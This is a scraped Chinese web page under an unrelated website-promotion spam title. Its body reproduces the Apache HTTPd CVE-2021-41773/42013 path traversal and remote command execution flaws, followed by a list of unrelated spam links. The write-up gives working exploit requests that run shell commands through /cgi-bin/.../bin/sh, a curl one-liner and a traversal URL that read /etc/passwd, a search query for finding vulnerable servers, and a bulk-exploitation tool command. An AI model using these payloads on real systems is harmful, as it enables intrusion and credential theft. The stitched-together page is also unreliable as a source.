当前位置: 首页 > news >正文

长春网站推广专门做二手书网站或app

长春网站推广,专门做二手书网站或app,手机商城网站建设设计方案,一 网站建设的目的与意义给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; 给个关注#xff1f;宝儿#xff01; CVE-2021-41773漏洞描述#xff1a; Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新#xff0c;披…给个关注宝儿 给个关注宝儿 给个关注宝儿 CVE-2021-41773漏洞描述 Apache HTTPd是Apache基金会开源的一款流行的HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新披露了CVE-2021-42013 Apache HTTPd 2.4.49/2.4.50 路径穿越漏洞。由于对CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞的修复不完善攻击者可构造恶意请求绕过补丁利用穿越漏洞读取到Web目录之外的其他文件。同时若Apache HTTPd开启了cgi支持攻击者可构造恶意请求执行命令控制服务器。 影响版本 Apache HTTPd 2.4.49/2.4.50版本 zoomeye语法 app:“apache web server 2.4.49 2.4.50” 复现过程 环境搭建 docker镜像 https://github.com/blasty/CVE-2021-41773 搭建效果 rce复现 抓包 poc: POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1 Host: your ip : port User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 If-Modified-Since: Sat, 16 Oct 2021 07:06:04 GMT If-None-Match: 29cd-5ce72f1ed2f00-gzip Cache-Control: max-age0 Content-Length: 41echo Content-Type: text/plain; echo; lsPOST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1 Host: ip:port Cache-Control: max-age0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q0.9 If-None-Match: 29cd-5ce4665e39700-gzip If-Modified-Since: Thu, 14 Oct 2021 01:57:16 GMT Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 12echo; whoamicurl curl --data echo;cat /etc/passwd http://ip:port/cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh修复 建议使用Apache HTTPd 2.4.49 与Apache HTTPd 2.4.50 版本的服务器更新Apache HTTPd 版本至最新。 批量利用检测利用工具 可视化界面工具 Github地址 https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013 PocSuite3工具 批量 python3 .\cli.py -r .\pocs\20211008_web_apache-httpd_dir-traversal-rce_cve-2021-41773_cve-2021-42013.py -f 1.txt --verifyCVE-2021-42013 目录穿越 漏洞成因 Apache HTTP Server 2.4.50版本对CVE-2021-41773的修复可以避免一次url编码导致的路径穿越但是由于在请求处理过程中还会调用ap_unescape_url函数对参数再次进行解码仍然会导致路径穿越。 在处理外部HTTP请求时会调用 ap_process_request_internal函数对url路径进行处理在该函数中首先会调用ap_normalize_path函数进行一次url解码之后会调用ap_unescape_url函数进行二次解码代码如下 触发 ip:port/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd看完点赞关注不迷路!!! 后续继续更新优质安全内容!!!
http://www.zqtcl.cn/news/723030/

相关文章:

  • 一个销售网站的设计方案重庆广告制作加工厂
  • 宽带固定ip的怎么做网站服务器网站设计说明书整合
  • 织梦装修公司网站模板wordpress主题代码编辑教程
  • 外边做一个网站要多少钱关键词的选取原则
  • 做网站需要备案吗wordpress会员邮件通知
  • 如何在百度创建网站欧宇公司网络建设方案
  • 网站网页设计基本理论视频模板套用免费
  • 外贸人常用的网站伪静态网站
  • 优质的聊城做网站网站建设论文 网站建设论文
  • 网站开发毕设的需求分析设计网站推荐
  • 武夷山景区网站建设优点网站建设服务合同要交印花税吗
  • 电子商务网站建设行情seo推广软件品牌
  • 荆州市住房和城乡建设厅官方网站网站开发加维护需要多少钱
  • 手机网站 cms宁波网站建设团队排名
  • 深圳网站建设怎么样微商城建设
  • 网站建设前台后台教程大安移动网站建设
  • 建设网站的程序国庆节网页设计素材
  • 彩票网站做代理人事外包公司
  • 免费的网站开发工具网站app开发
  • 厦门的服装商城网站建设语种网站建设
  • 云服务器怎么做网站东莞黄江网站建设
  • 地方网站模板德清县新巿镇城市建设网站
  • 昆明传媒网站建设模板兔自用WordPress
  • 高企达建设有限公司网站青村网站建设
  • 网站设计公司服务连锁品牌网站建设
  • 石家庄桥西网站制作公司wordpress 使用插件下载
  • 深圳外贸建站网络推广哪家好制造业小程序网站开发
  • 电子商务网站开发步骤宁波制作网站知名
  • 网站建设所需网站是别人做的 ftp账号吗
  • 网站集约化建设情况的汇报做网站为什么要买网站空间